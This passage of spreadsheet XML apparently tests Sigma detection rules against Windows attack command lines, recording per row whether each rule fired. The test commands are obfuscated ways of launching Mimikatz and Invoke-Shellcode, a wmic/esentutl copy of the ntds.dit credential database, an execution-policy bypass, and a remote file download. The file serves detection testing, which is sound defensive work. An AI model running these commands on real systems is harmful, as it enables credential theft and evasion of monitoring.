      <c r="J4385" s="43" t="n"/>
      <c r="K4385" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4386" ht="15.75" customHeight="1" s="42">
      <c r="A4386" s="43" t="inlineStr">
        <is>
          <t>t1134.004</t>
        </is>
      </c>
      <c r="B4386" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C4386" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D4386" s="43" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E4386" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Convert]::FromBase64String('d2hvYW1p')"</t>
        </is>
      </c>
      <c r="F4386" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4386" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4386" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4386" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J4386" s="43" t="n"/>
      <c r="K4386" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4387" ht="15.75" customHeight="1" s="42">
      <c r="A4387" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B4387" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4387" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4387" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4387" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F4387" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4387" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4387" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4387" s="43" t="n"/>
      <c r="J4387" s="43" t="n"/>
      <c r="K4387" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4388" ht="15.75" customHeight="1" s="42">
      <c r="A4388" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B4388" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4388" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4388" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4388" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F4388" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4388" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4388" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4388" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J4388" s="43" t="n"/>
      <c r="K4388" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4389" ht="15.75" customHeight="1" s="42">
      <c r="A4389" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4389" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C4389" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D4389" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E4389" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cmdkey.exe /del^ete:Microsoft_Windows_Shell_ZipFolder:filename=payload.z^ip"</t>
        </is>
      </c>
      <c r="F4389" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4389" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4389" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution (90dcf730-1b71-4ae7-9ffc-6fcf62bd0132)</t>
        </is>
      </c>
      <c r="J4389" s="43" t="n"/>
      <c r="K4389" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4390" ht="15.75" customHeight="1" s="42">
      <c r="A4390" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4390" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4390" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4390" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4390" s="43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90" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4390" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4390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4390" s="43" t="n"/>
      <c r="K4390" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4391" ht="15.75" customHeight="1" s="42">
      <c r="A4391" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4391" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4391" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4391" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4391" s="43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91" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4391" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4391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4391" s="43" t="n"/>
      <c r="K4391" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4392" ht="15.75" customHeight="1" s="42">
      <c r="A4392" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4392" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4392" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4392" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4392" s="43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92" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4392" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4392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4392" s="43" t="n"/>
      <c r="K4392" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4393" ht="15.75" customHeight="1" s="42">
      <c r="A4393" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4393" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4393" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4393" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4393" s="43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93" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4393" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4393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4393" s="43" t="n"/>
      <c r="K4393" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4394" ht="15.75" customHeight="1" s="42">
      <c r="A4394" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4394" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4394" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4394" s="43" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4394" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:"localhost" process   call   create "cmd.exe /c esentutl.exe /y /vss c:\windows
tds
tds.dit /d c:
tds.dit"</t>
        </is>
      </c>
      <c r="F4394" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4394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(526be59f-a573-4eea-b5f7-f0973207634d); WMIC Remote Command Execution (7773b877-5abb-4a3e-b9c9-fd0369b59b00)</t>
        </is>
      </c>
      <c r="J4394" s="43" t="n"/>
      <c r="K4394" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4395" ht="15.75" customHeight="1" s="42">
      <c r="A4395" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4395" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4395" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4395" s="43" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4395" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:127.0.0.1 process call create "rundll32,StartW C:\AtomicRedTeam\atomics\..\ExternalPayloads\calc.dll"</t>
        </is>
      </c>
      <c r="F4395" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4395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395" s="43" t="n"/>
      <c r="K4395" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4396" ht="15.75" customHeight="1" s="42">
      <c r="A4396" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4396" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C4396" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D4396" s="43" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E4396" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F4396" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4396" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4396" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J4396" s="43" t="n"/>
      <c r="K4396" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4397" ht="15.75" customHeight="1" s="42">
      <c r="A4397" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4397" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4397" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4397" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4397" s="43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4397" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4397" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4397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397" s="43" t="n"/>
      <c r="K4397" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4398" ht="15.75" customHeight="1" s="42">
      <c r="A4398" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4398" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4398" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4398" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4398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398" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4398" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4398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398" s="43" t="n"/>
      <c r="K4398" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4399" ht="15.75" customHeight="1" s="42">
      <c r="A4399" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4399" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4399" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4399" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4399" s="4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4399" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4399" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4399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399" s="43" t="n"/>
      <c r="K4399" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4400" ht="15.75" customHeight="1" s="42">
      <c r="A4400" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4400" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4400" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4400" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4400" s="4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4400" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4400" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4400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400" s="43" t="n"/>
      <c r="K4400" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4401" ht="15.75" customHeight="1" s="42">
      <c r="A4401" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4401" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4401" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4401" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4401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401" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4401" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4401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401" s="43" t="n"/>
      <c r="K4401" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4402" ht="15.75" customHeight="1" s="42">
      <c r="A4402" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4402" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C4402" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D4402" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E4402" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "fsutil behavior set Symlink^Evaluation R2L:1"</t>
        </is>
      </c>
      <c r="F4402" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4402" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4402" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation (c0b2768a-dd06-4671-8339-b16ca8d1f27f)</t>
        </is>
      </c>
      <c r="J4402" s="43" t="n"/>
      <c r="K4402" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4403" ht="15.75" customHeight="1" s="42">
      <c r="A4403" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4403" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4403" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4403" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4403" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F4403" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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03" s="43" t="n"/>
      <c r="K4403" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4404" ht="15.75" customHeight="1" s="42">
      <c r="A4404" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4404" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4404" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4404" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4404" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F4404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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04" s="43" t="n"/>
      <c r="K4404" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4405" ht="15.75" customHeight="1" s="42">
      <c r="A4405" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B4405" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4405" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4405" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4405" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F4405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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05" s="43" t="n"/>
      <c r="K4405" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4406" ht="15.75" customHeight="1" s="42">
      <c r="A4406" s="43" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B4406" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_bloopers_modules</t>
        </is>
      </c>
      <c r="C4406" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules</t>
        </is>
      </c>
      <c r="D4406" s="43" t="inlineStr">
        <is>
          <t>4f154fb6-27d1-4813-a759-78b93e0b9c48</t>
        </is>
      </c>
      <c r="E4406" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-UserHunter"</t>
        </is>
      </c>
      <c r="F4406" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4406" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4406" s="43" t="inlineStr">
        <is>
          <t>Operator Bloopers Cobalt Strike Modules (4f154fb6-27d1-4813-a759-78b93e0b9c48); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc); Malicious PowerShell Commandlets - ProcessCreation (02030f2f-6199-49ec-b258-ea71b07e03dc)</t>
        </is>
      </c>
      <c r="J4406" s="43" t="n"/>
      <c r="K4406" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4407" ht="15.75" customHeight="1" s="42">
      <c r="A4407" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4407" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4407" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4407" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4407" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F4407" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4407" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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4407" s="43" t="n"/>
      <c r="K4407" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4408" ht="15.75" customHeight="1" s="42">
      <c r="A4408" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4408" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4408" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4408" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4408" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F4408" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4408" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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08" s="43" t="n"/>
      <c r="K4408" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4409" ht="15.75" customHeight="1" s="42">
      <c r="A4409" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B4409" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4409" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4409" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4409" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F4409" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4409" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I440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09" s="43" t="n"/>
      <c r="K4409" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4410" ht="15.75" customHeight="1" s="42">
      <c r="A4410" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B4410" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4410" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4410" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4410" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F4410" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4410" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I441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10" s="43" t="n"/>
      <c r="K4410" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4411" ht="15.75" customHeight="1" s="42">
      <c r="A4411" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B4411" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C4411" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D4411" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E4411" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F4411" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4411" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I441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11" s="43" t="n"/>
      <c r="K4411" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4412" ht="15.75" customHeight="1" s="42">
      <c r="A4412" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4412" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C4412" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D4412" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E4412" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" htt^ps://[raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml)"</t>
        </is>
      </c>
      <c r="F4412" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4412" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4412" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J4412" s="43" t="n"/>
      <c r="K4412" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4413" ht="15.75" customHeight="1" s="42">
      <c r="A4413" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4413" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C4413" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D4413" s="43" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E4413" s="43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4413" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4413" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4413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4413" s="43" t="n"/>
      <c r="K4413" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4414" ht="15.75" customHeight="1" s="42">
      <c r="A4414" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
